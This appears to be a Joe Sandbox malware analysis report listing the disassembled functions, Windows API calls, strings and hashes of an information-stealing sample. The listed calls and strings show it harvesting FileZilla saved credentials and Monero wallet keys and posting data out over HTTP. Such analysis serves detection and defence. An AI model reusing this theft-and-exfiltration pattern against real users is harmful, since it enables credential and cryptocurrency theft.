\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 008B02A4
<Pass encoding="base64">, xrefs: 008B045A
<User>, xrefs: 008B0410
profile: null, xrefs: 008B0568
url: , xrefs: 008B0577
<Host>, xrefs: 008B037C

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: 5be88f73493e5e836add9716ff281af58112899c1291792f2a2468f4b73a987f
Instruction ID: 873ac7ab32cde6df24831d5ad0cfc03c856ae6210a9d586153e48206eef79b06
Opcode Fuzzy Hash: 5be88f73493e5e836add9716ff281af58112899c1291792f2a2468f4b73a987f
Instruction Fuzzy Hash: 1ED11171900208ABDB08EBF8DD96EEE7778FF24700F544518F112E6291DF74AA46CB62

Function 008A5100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

Part of subcall function 008A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008A4839
Part of subcall function 008A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008A4849

lstrlen.KERNEL32(00000000), ref: 008A5193

Part of subcall function 008B8EA0: CryptBinaryToStringA.CRYPT32(00000000,008A5184,40000001,00000000,00000000,?,008A5184), ref: 008B8EC0

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008A5207
StrCmpCA.SHLWAPI(?,0127EA70), ref: 008A5225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008A5340
HttpOpenRequestA.WININET(00000000,0127E9E0,?,0127E0F8,00000000,00000000,00400100,00000000), ref: 008A53A4

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0127EA50,00000000,?,0127A848,00000000,?,008C19DC,00000000,?,008B51CF), ref: 008A5737
lstrlen.KERNEL32(00000000), ref: 008A574B
GetProcessHeap.KERNEL32(00000000,?), ref: 008A575C
RtlAllocateHeap.NTDLL(00000000), ref: 008A5763
lstrlen.KERNEL32(00000000), ref: 008A5778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008A57A9
lstrlen.KERNEL32(00000000), ref: 008A57C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008A57E1
lstrlen.KERNEL32(00000000,?,?), ref: 008A580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 008A5822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008A584D
InternetCloseHandle.WININET(00000000), ref: 008A58B1
InternetCloseHandle.WININET(00000000), ref: 008A58BE
InternetCloseHandle.WININET(00000000), ref: 008A58C8

Strings

", xrefs: 008A55C4
------, xrefs: 008A563B
", xrefs: 008A5706
------, xrefs: 008A53B7
------, xrefs: 008A5297
------, xrefs: 008A54F9
", xrefs: 008A5482
--, xrefs: 008A5280

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: c605b28c502e566d66ac9bd0d8f3252fabe022f1cb428b21a53830d9c18f6239
Instruction ID: 6ea8f67a496defdba671aa714e152d930ffb209dfd2e90cdb033f2918ff8b554
Opcode Fuzzy Hash: c605b28c502e566d66ac9bd0d8f3252fabe022f1cb428b21a53830d9c18f6239
Instruction Fuzzy Hash: 4D324071920118BADB18EBA4DC95FEEB378FF14700F4041A9B116E6692DF346A49CF63

Function 008AA790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008BAA70: StrCmpCA.SHLWAPI(012790D8,008AA7A7,?,008AA7A7,012790D8), ref: 008BAA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008AAAC8
RtlAllocateHeap.NTDLL(00000000), ref: 008AAACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 008AABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008AA8B0

Part of subcall function 008BA820: lstrlen.KERNEL32(008A4F05,?,?,008A4F05,008C0DDE), ref: 008BA82B
Part of subcall function 008BA820: lstrcpy.KERNEL32(008C0DDE,00000000), ref: 008BA885

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

lstrcat.KERNEL32(?,00000000), ref: 008AACEB
lstrcat.KERNEL32(?,008C1320), ref: 008AACFA
lstrcat.KERNEL32(?,00000000), ref: 008AAD0D
lstrcat.KERNEL32(?,008C1324), ref: 008AAD1C
lstrcat.KERNEL32(?,00000000), ref: 008AAD2F
lstrcat.KERNEL32(?,008C1328), ref: 008AAD3E
lstrcat.KERNEL32(?,00000000), ref: 008AAD51
lstrcat.KERNEL32(?,008C132C), ref: 008AAD60
lstrcat.KERNEL32(?,00000000), ref: 008AAD73
lstrcat.KERNEL32(?,008C1330), ref: 008AAD82
lstrcat.KERNEL32(?,00000000), ref: 008AAD95
lstrcat.KERNEL32(?,008C1334), ref: 008AADA4
lstrcat.KERNEL32(?,00000000), ref: 008AADB7
lstrlen.KERNEL32(?), ref: 008AAE0D
lstrlen.KERNEL32(?), ref: 008AAE1C

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

DeleteFileA.KERNEL32(00000000), ref: 008AAE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 008AABD4

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: af823626ee1604501391ddd8e5c14f1a76178f95969869407e2fe7565027eb42
Instruction ID: 513cd892460338bbded8ef17c5c5bb32efadaceaa7fe7b877ff5ed1859413a8c
Opcode Fuzzy Hash: af823626ee1604501391ddd8e5c14f1a76178f95969869407e2fe7565027eb42
Instruction Fuzzy Hash: 1612FF71910108ABDB18EBA4DDD6EEE7778FF14301F504168B506E66A1DF34AE0ACB63

Function 008A5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

Part of subcall function 008A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008A4839
Part of subcall function 008A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008A4849

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008A59F8
StrCmpCA.SHLWAPI(?,0127EA70), ref: 008A5A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008A5B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0127EA20,00000000,?,0127A848,00000000,?,008C1A1C), ref: 008A5E71
lstrlen.KERNEL32(00000000), ref: 008A5E82
GetProcessHeap.KERNEL32(00000000,?), ref: 008A5E93
RtlAllocateHeap.NTDLL(00000000), ref: 008A5E9A
lstrlen.KERNEL32(00000000), ref: 008A5EAF
lstrlen.KERNEL32(00000000), ref: 008A5ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008A5EF1
lstrlen.KERNEL32(00000000,?,?), ref: 008A5F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 008A5F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 008A5F4C
InternetCloseHandle.WININET(00000000), ref: 008A5FB0
InternetCloseHandle.WININET(00000000), ref: 008A5FBD
HttpOpenRequestA.WININET(00000000,0127E9E0,?,0127E0F8,00000000,00000000,00400100,00000000), ref: 008A5BF8

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

InternetCloseHandle.WININET(00000000), ref: 008A5FC7

Strings

------, xrefs: 008A5C0B
", xrefs: 008A5E16
", xrefs: 008A5CD5
------, xrefs: 008A5D4C
------, xrefs: 008A5A96

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: a76ac64bfedd35942ac3c4d4de105b2ae1dc12696e5241347976cf32554ab2a8
Instruction ID: b382fba67876ab2e92635afced4eafb430cf46018806ae1b0a6eaa0ddf9b30f0
Opcode Fuzzy Hash: a76ac64bfedd35942ac3c4d4de105b2ae1dc12696e5241347976cf32554ab2a8
Instruction Fuzzy Hash: 0E121171820118BADB19EBA4DCD5FEEB378FF14700F404169B106E66A1DF706A4ACF66

Function 008ACEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

Part of subcall function 008B8B60: GetSystemTime.KERNEL32(008C0E1A,0127A8D8,008C05AE,?,?,008A13F9,?,0000001A,008C0E1A,00000000,?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008B8B86

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008ACF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008AD0C7
RtlAllocateHeap.NTDLL(00000000), ref: 008AD0CE
lstrcat.KERNEL32(?,00000000), ref: 008AD208
lstrcat.KERNEL32(?,008C1478), ref: 008AD217
lstrcat.KERNEL32(?,00000000), ref: 008AD22A
lstrcat.KERNEL32(?,008C147C), ref: 008AD239
lstrcat.KERNEL32(?,00000000), ref: 008AD24C
lstrcat.KERNEL32(?,008C1480), ref: 008AD25B
lstrcat.KERNEL32(?,00000000), ref: 008AD26E
lstrcat.KERNEL32(?,008C1484), ref: 008AD27D
lstrcat.KERNEL32(?,00000000), ref: 008AD290
lstrcat.KERNEL32(?,008C1488), ref: 008AD29F
lstrcat.KERNEL32(?,00000000), ref: 008AD2B2
lstrcat.KERNEL32(?,008C148C), ref: 008AD2C1
lstrcat.KERNEL32(?,00000000), ref: 008AD2D4
lstrcat.KERNEL32(?,008C1490), ref: 008AD2E3

Part of subcall function 008BA820: lstrlen.KERNEL32(008A4F05,?,?,008A4F05,008C0DDE), ref: 008BA82B
Part of subcall function 008BA820: lstrcpy.KERNEL32(008C0DDE,00000000), ref: 008BA885

lstrlen.KERNEL32(?), ref: 008AD32A
lstrlen.KERNEL32(?), ref: 008AD339

Part of subcall function 008BAA70: StrCmpCA.SHLWAPI(012790D8,008AA7A7,?,008AA7A7,012790D8), ref: 008BAA8F

DeleteFileA.KERNEL32(00000000), ref: 008AD3B4

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: 719331570fdb1471d6b6fbfaa7c8d5a50a85e167ed70e85624dff417d73f26a1
Instruction ID: 2e5425e4f0634243279dbc9d375b3e010bf2c5447fb1b0af0b5b7c752781149d
Opcode Fuzzy Hash: 719331570fdb1471d6b6fbfaa7c8d5a50a85e167ed70e85624dff417d73f26a1
Instruction Fuzzy Hash: 4BE1FA71910108ABDB18EBA4DD96EEE7778FF24301F104168F106F66A1DE35BA06CB67

Function 008B8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

RegOpenKeyExA.KERNEL32(00000000,0127B020,00000000,00020019,00000000,008C05B6), ref: 008B83A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008B8426
wsprintfA.USER32 ref: 008B8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 008B847B
RegCloseKey.ADVAPI32(00000000), ref: 008B848C
RegCloseKey.ADVAPI32(00000000), ref: 008B8499

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

Strings

%s\%s, xrefs: 008B844D
?, xrefs: 008B837A
- , xrefs: 008B85A3

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
